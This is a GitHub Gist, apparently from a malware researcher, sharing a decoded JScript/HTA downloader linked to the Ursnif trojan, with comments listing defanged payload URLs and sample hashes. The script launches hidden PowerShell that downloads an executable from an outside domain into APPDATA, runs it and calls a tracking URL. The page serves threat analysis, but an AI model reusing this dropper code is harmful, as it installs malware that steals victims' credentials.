Created
March 2, 2018 12:10
-
-
Save Blevene/a617715d2fe2a1a72fdace3a376dd3dd to your computer and use it in GitHub Desktop.
Decoded downloader component from d8ecb55b823b87a06eb8fc524baff969974a092385ac09bdb02537202380375c
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| var diskomagana = ActiveXObject; | |
| var termianxala = new diskomagana('WScript.Shell'); | |
| var lopomeriara = (decodeURIComponent("p o w e r s h e l l")).replace(/ /g,'') + ' -Exec Bypass -NoExit -Command (New-Object System.Net.WebClient).DownloadFile(\'http://jnossidjfnweqrfew.com/NOB/bomberc.class\', $env:APPDATA + \'\\\\fb1b1d10.exe\'); Start-Process $env:APPDATA\'\\\\fb1b1d10.exe\'; (New-Object System.Net.WebClient).DownloadString(\'http://jnossidjfnweqrfew.com/OU/freddie.php?l=bomberc\'); ;'.replace(//g,''); | |
| setTimeout(function(){window.close()},16180); | |
| setTimeout(function(){termianxala.run(lopomeriara,0)}) | |
| </script> |
It appears this pattern of mshta.exe downloading from a URI with utma= in it goes back to December 2017. All Ursnif.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
I managed to find a live payload from:
hXXp://173.44.42[.]156/track/amgb.class
hXXp://173.44.42[.]156/track/amg.class
hXXp://173.44.42[.]156/track/amgc.class
Which was present in
3e9d59dcefb6fa5e17d2d9fb9d50e63b712b9fd852444cd341d0675b6ed70186 from
the 26th of February.
The payload,
2c5429d1b834abab3c96da9708e6fb77f52d5b26dc32b6411f3d2c70652210b2, is Ursnif